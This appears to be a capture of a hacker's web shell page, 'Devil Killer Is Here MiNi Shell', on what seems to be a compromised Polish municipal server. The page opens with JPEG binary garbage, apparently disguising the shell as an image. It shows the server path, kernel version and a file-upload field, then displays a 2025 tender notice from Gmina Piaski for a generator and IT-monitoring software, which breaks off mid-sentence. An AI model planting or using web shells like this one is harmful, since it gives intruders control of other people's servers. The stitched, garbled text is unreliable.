JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250924/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250924/0044040501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej dla Gminy Piaski realizowanego w ramach „Cyberbezpieczny Samorząd” (2 części) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIASKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050563</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 6 Stycznia 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piaski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-820</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">655719030</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">655719049</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@piaski-wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.piaski-wlkp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej dla Gminy Piaski realizowanego w ramach „Cyberbezpieczny Samorząd” (2 części) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-697b0f6f-fdfb-49be-af5c-1c57a3490e1d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00440405</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037375/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej dla Gminy Piaski realizowanego w ramach &#34;Cyberbezpieczny Samorząd&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie będzie dofinansowane - w ramach grantu uzyskanego w ramach konkursu grantowego „Cyberbezpieczny Samorząd” ze środków programu Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC), Priorytet II Priorytet II: Zaawansowane usługi cyfrowe. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_piaski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_piaski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków<br/>dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu. 2. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platforma zakupowa.pl, tj.:a) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f) Szyfrowanie na platforma zakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.3. Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku” W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia<br/>odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.4. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.5. RFormaty plików wykorzystywanych przez wykonawców powinny być zgodne z “ROZPORZĄDZENIEM PREZESA RADY MINISTRÓW z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych”: W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. W przypadku problemów technicznych związanych z obsługą platformazakupowa.pl Zamawiający dopuszcza kontakt przy użyciu poczty elektronicznej w.furmaniak@piaski-wlkp.pl jako kanału pomocniczego w sytuacjach awaryjnych. Szczegółowe informacje techniczne i organizacyjne dot. korespondencji elektronicznej zawarto w rozdziale 1.5 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem 12 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem 12 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.04.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej dla Gminy Piaski realizowanego w ramach „Cyberbezpieczny Samorząd”, dofinansowanego w formie grantu z programu Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC), Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2.<br/>Wzmocnienie krajowego systemu cyberbezpieczeństwa.<br/>Część 1 - generator prądu,<br/>- generator prądu<br/>Szczegółowy Opis przedmiotu zamówienia (dla każdej części) przedstawiony został w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31120000-3 - Generatory</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35100000-5 - Urządzenia awaryjne i zabezpieczające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria wyboru najkorzystniejszej oferty<br/>- Za ofertę najkorzystniejszą zostanie uznana oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny.<br/>- Zamawiający wybiera ofertę najkorzystniejszą na podstawie poniżej wskazanych kryteriów oceny ofert:<br/>- Dotyczy części 1-2:<br/>• cena – waga 60%,<br/>• skrócenie terminu wykonania zamówienia – waga 40%.<br/>- Zasady oceny ofert według ustalonych kryteriów<br/>- Liczba uzyskanych punktów przez daną ofertę stanowi s u m ę p u n k t ó w przyznanych przez Komisję, zgodnie ze stosowanymi kryteriami.<br/>- Komisja zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>1) Kryteria mają przyporządkowaną ilość punktów w skali od 0 do 100 zgodnie z posiadaną wagą.<br/>2) Sprecyzowanie kryteriów oceny ofert:<br/>Część 1-2:<br/>A. Cena (P) – przeliczana wskaźnikiem<br/> Pmin<br/>P= -------------- x 60<br/> Pb<br/>gdzie:<br/>Kryterium oceny „Cena” (P) – definicje<br/>P Liczba punktów jakie otrzyma badana oferta za kryterium „Cena” (P)<br/>Pmin: Wartość brutto z oferty z najniższą ceną<br/>Pb: Wartość brutto oferty badanej<br/>Oferta z najniższą ceną otrzyma 60 punktów.<br/>Ocena punktowa w kryterium „cena” dokonana zostanie na podstawie ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i<br/>przeliczona według wzoru opisanego powyżej.<br/>- Skrócenie terminu wykonania zamówienia (T):<br/>W ramach niniejszego kryterium Zamawiający będzie oceniać wskazany przez Wykonawcę termin wykonania zamówienia.<br/>Maksymalny, wymagany, niepunktowany termin wykonania zamówienia wynosi 60 dni od dnia podpisania umowy. Zamawiający<br/>przyzna punkty za skrócenie terminu<br/>w następujący sposób:<br/>(1) za wykonanie zamówienia w terminie 45 dni - 20 pkt;<br/>(2) za wykonanie zamówienia w terminie 30 dni - 40 pkt.<br/>a) w przypadku gdy Wykonawca nie wskaże w Formularzu oferty skróconego terminu wykonania zamówienia, Zamawiający uzna, że<br/>Wykonawca wykona zamówienie w terminie 60 dni i za niniejsze kryterium oceny ofert otrzyma 0 pkt.<br/>b) maksymalna ilość punktów jaką może otrzymać Wykonawca za niniejsze kryterium to 40 pkt. Ocena punktowa wg kryterium<br/>„skrócenie terminu wykonania zamówienia” zostanie dokonana na podstawie danych zawartych w Formularzu oferty.<br/>C. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>LP = P + T<br/>gdzie:<br/>LP – całkowita liczba punktów,<br/>P – punkty przyznane w kryterium „Cena”,<br/>T – punkty uzyskane w kryterium „Skrócenie terminu wykonania zamówienia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej dla Gminy Piaski realizowanego w ramach „Cyberbezpieczny Samorząd”, dofinansowanego w formie grantu z programu Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC), Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2.<br/>Wzmocnienie krajowego systemu cyberbezpieczeństwa.<br/>Część 2 - oprogramowanie do monitorowania infrastruktury informatycznej,<br/>- oprogramowanie do monitorowania infrastruktury informatycznej,<br/>Szczegółowy Opis przedmiotu zamówienia (dla każdej części) przedstawiony został w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72268000-1 - Usługi dostawy oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria wyboru najkorzystniejszej oferty<br/>- Za ofertę najkorzystniejszą zostanie uznana oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny.<br/>- Zamawiający wybiera ofertę najkorzystniejszą na podstawie poniżej wskazanych kryteriów oceny ofert:<br/>- Dotyczy części 1-2:<br/>• cena – waga 60%,<br/>• skrócenie terminu wykonania zamówienia – waga 40%.<br/>- Zasady oceny ofert według ustalonych kryteriów<br/>- Liczba uzyskanych punktów przez daną ofertę stanowi s u m ę p u n k t ó w przyznanych przez Komisję, zgodnie ze stosowanymi kryteriami.<br/>- Komisja zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>1) Kryteria mają przyporządkowaną ilość punktów w skali od 0 do 100 zgodnie z posiadaną wagą.<br/>2) Sprecyzowanie kryteriów oceny ofert:<br/>Część 1-2:<br/>A. Cena (P) – przeliczana wskaźnikiem<br/> Pmin<br/>P= -------------- x 60<br/> Pb<br/>gdzie:<br/>Kryterium oceny „Cena” (P) – definicje<br/>P Liczba punktów jakie otrzyma badana oferta za kryterium „Cena” (P)<br/>Pmin: Wartość brutto z oferty z najniższą ceną<br/>Pb: Wartość brutto oferty badanej<br/>Oferta z najniższą ceną otrzyma 60 punktów.<br/>Ocena punktowa w kryterium „cena” dokonana zostanie na podstawie ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i<br/>przeliczona według wzoru opisanego powyżej.<br/>- Skrócenie terminu wykonania zamówienia (T):<br/>W ramach niniejszego kryterium Zamawiający będzie oceniać wskazany przez Wykonawcę termin wykonania zamówienia.<br/>Maksymalny, wymagany, niepunktowany termin wykonania zamówienia wynosi 60 dni od dnia podpisania umowy. Zamawiający<br/>przyzna punkty za skrócenie terminu<br/>w następujący sposób:<br/>(1) za wykonanie zamówienia w terminie 45 dni - 20 pkt;<br/>(2) za wykonanie zamówienia w terminie 30 dni - 40 pkt.<br/>a) w przypadku gdy Wykonawca nie wskaże w Formularzu oferty skróconego terminu wykonania zamówienia, Zamawiający uzna, że<br/>Wykonawca wykona zamówienie w terminie 60 dni i za niniejsze kryterium oceny ofert otrzyma 0 pkt.<br/>b) maksymalna ilość punktów jaką może otrzymać Wykonawca za niniejsze kryterium to 40 pkt. Ocena punktowa wg kryterium<br/>„skrócenie terminu wykonania zamówienia” zostanie dokonana na podstawie danych zawartych w Formularzu oferty.<br/>C. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>LP = P + T<br/>gdzie:<br/>LP – całkowita liczba punktów,<br/>P – punkty przyznane w kryterium „Cena”,<br/>T – punkty uzyskane w kryterium „Skrócenie terminu wykonania zamówienia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają następujące warunki dotyczące:<br/>1.1 zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku udziału w postępowaniu - dotyczy części<br/>1-2.<br/>1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie określa warunku udziału w postępowaniu- dotyczy części<br/>1-2.<br/>1.3 sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku udziału w postępowaniu - dotyczy części<br/>1-2.<br/>1.4 zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie:<br/>Część 1:<br/>1) minimum 2 zamówienia na dostawę generatora prądu.<br/>Część 2:<br/>1) minimum 2 zamówienia na dostawę oprogramowania do monitorowania infrastruktury informatycznej.<br/>Uwaga:<br/>Nie dopuszcza się sumowania zamówień/ dostaw celem uzyskania wymaganej minimalnej wartości.<br/>W przypadku składania oferty przez podmioty występujące wspólnie warunek może być spełniony łącznie.<br/>W przypadku, gdy wartość zamówienia jest określona w innej walucie niż w złotych polskich, Zamawiający dokona przeliczenia tej wartości na złote polskie – na podstawie średniego kursu złotego w stosunku do walut obcych, określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień opublikowania Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>Zamawiający uzna warunek za spełniony, jeśli 